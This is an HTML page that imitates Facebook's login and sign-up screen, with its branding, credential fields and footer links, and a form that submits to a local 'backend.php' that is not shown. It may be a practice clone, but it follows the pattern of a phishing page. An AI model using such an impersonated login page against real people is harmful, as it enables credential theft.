<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login | Sign up</title>
    <style>
        .container {
            display: block;
            margin: 5px -50px;
        }

        body {
            background-color: #f0f2f5;
        }

        .loginform {
            border: 1px solid rgb(212, 212, 212);
            display: inline-block;
            margin: 100px 791px;
            padding: 15px 90px;
            background-color: whitesmoke;
        }

        .email {
            padding: 10px 50px;
            margin: 10px 0px;
        }

        .pass {
            padding: 10px 50px;
            margin: 10px 0px;

        }

        .btn {
            padding: 5px 119px;
            margin: 25px 0px;
            height: 40px;
            color: white;
            background-color:#0050ff ;
            border: none;
            border-radius: 2px;
        }

        .cn {
            padding: 5px 103px;
            margin: 4px 0px;
            height: 40px;
            text-align: center;
            color: white;
            background-color: #11ad11;
            border: none;
            border-radius: 2px;
        }

        .btn:hover {
            background-color: #729eff;
        }

        .cn:hover {
            background-color: #087c08;
        }

        .logoimg {
            height: 40px;
            width: 140px;
            margin: auto;
        }

        .fg {
            margin: 2px 66px;
            display: block
        }

        .fg:hover {
            color: rgb(54, 131, 255);
        }

        .info {
            /* border: 1px solid black; */
            padding: 45px 80px;
            margin: 2px 42px
           }
           .info{
               background-color: whitesmoke;
           }
        .info a{
            margin: 15px 3px;
            text-decoration: none;
            padding: 5px 1px;
            color: grey;
        }
        .info a:hover{
            color: black;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="loginform">
            <div class="logoimg">
                <img src="img/facebook.jpeg" alt="" class="logoimg">
            </div>
            <h2 class="header">Facebook Login or Signup</h2>
            <form action="backend.php">
                <input type="text" placeholder="Email or Phone number" class="email">
                <br>
                <input type="text" placeholder="Password" class="pass">
                <br>
                <button class="btn">
                    Login
                </button>
                <br>
                <a href="#" class="fg">Forgotten Password ?</a>
                <br>
                <button class="cn">CreateNew</button>
            </form>

        </div>
        <div class="info">
            <a href="#"> 
                English (UK) 
            </a> 
            
            <a href="#">
                मराठी
            </a>
            <a href="#">
                हिन्दी
            </a>
            <a href="#">
                 اردو
            </a>
            <a href="#">
                ગુજરાતી</a>
              <a href="#">
                  ಕನ್ನಡ</a>
              <a href="#">
                  മലയാള 
                </a>
                <a href="#">
                    తెలుగ
                </a>
                <a href="#">
                    বাংলা
                </a>
                <a href="#">
                    தமிழ்
                </a>
                <a href="#">
                    ਪੰਜਾਬੀ
                </a>
                <a href="#">
                   Sign Up
                </a>
                <a href="#">
                    Log In Messenger 
                </a>
                <a href="#">
                    Facebook Lite 
                </a>
                <a href="#">
                    Watch People 
                </a>
                <a href="#">
                    Page categories Places
                </a>
                <a href="#">
                    Games 
                </a>
                <a href="#">
                    Locations 
                </a>
                <a href="#">
                    Marketplace 
                </a>
                <a href="#">
                   Facebook PayGroups         
                </a>
                <a href="#">
                    Jobs  
                </a>
                <a href="#">
                    Oculus Portal
                </a>
                <a href="#">
                   Instagram 
                    
                </a>
                <a href="#">
                   Local Fundraisers  
                </a>
                <a href="#">
                   Services 
                </a>
                <a href="#">
                   Voting Information Centre 
                </a>
                <a href="#">
                    About 
                </a>
                <a href="#">
                    Create ad  
                </a>
                <a href="#">
                   Create Page  
                </a>
                <a href="#">
                   Developers Careers 
                </a>
                <a href="#">
                   Privacy Cookies 
                </a>
                <a href="#">
                   AdChoices  
                </a>
                <a href="#">
                    Terms  
                </a>
                <a href="#">
                    Help 
                </a>
                <a href="#">
                    Settings  
                </a>
                <a href="#">
                   Activity log  
                </a>
                <br>
                
                <h4>Facebook © 2020</h4>
                        
                     
        </div>
    </div>
</body>

</html>